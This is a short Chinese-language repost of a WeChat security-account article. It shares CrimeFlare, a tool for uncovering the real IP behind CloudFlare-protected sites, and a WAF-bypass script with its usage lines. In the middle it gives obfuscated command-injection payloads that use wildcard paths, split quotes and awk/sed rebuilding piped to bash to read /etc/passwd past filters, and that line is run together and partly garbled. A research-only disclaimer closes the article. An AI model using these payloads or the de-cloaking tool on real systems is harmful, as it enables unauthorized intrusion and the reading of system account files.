一、CrimeFlare
利用CrimeFlare查看受CloudFlare保护的网站背后真实IP的工具。
-
CloudFlare IP -
真实IP -
主机名 -
组织 -
城市 -
国家 -
邮政 -
地点 -
时区
php crimeflare.php exemple.com
cat /etc/passwd
可以通过以下方式执行命令:%2f???%2f??t%20%2f???%2fp??s??cat+/e't'c/pa'ss'wde'c'ho 'swd test pentest' |awk '{print "cat /etc/pas"$1}' | bashec'h'o 'cat /etc/examplewd' | sed 's/example/pass/g' | bash
用法
python3 /opt/waf-bypass/main.py --host ='example.com'
或者python3 /opt/waf-bypass/main.py --host ='example.com'--proxy ='http://proxy.example.com:3128'
本文始发于微信公众号(乌雲安全):工具|渗透利器之CrimeFlare、waf绕过脚本分享
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论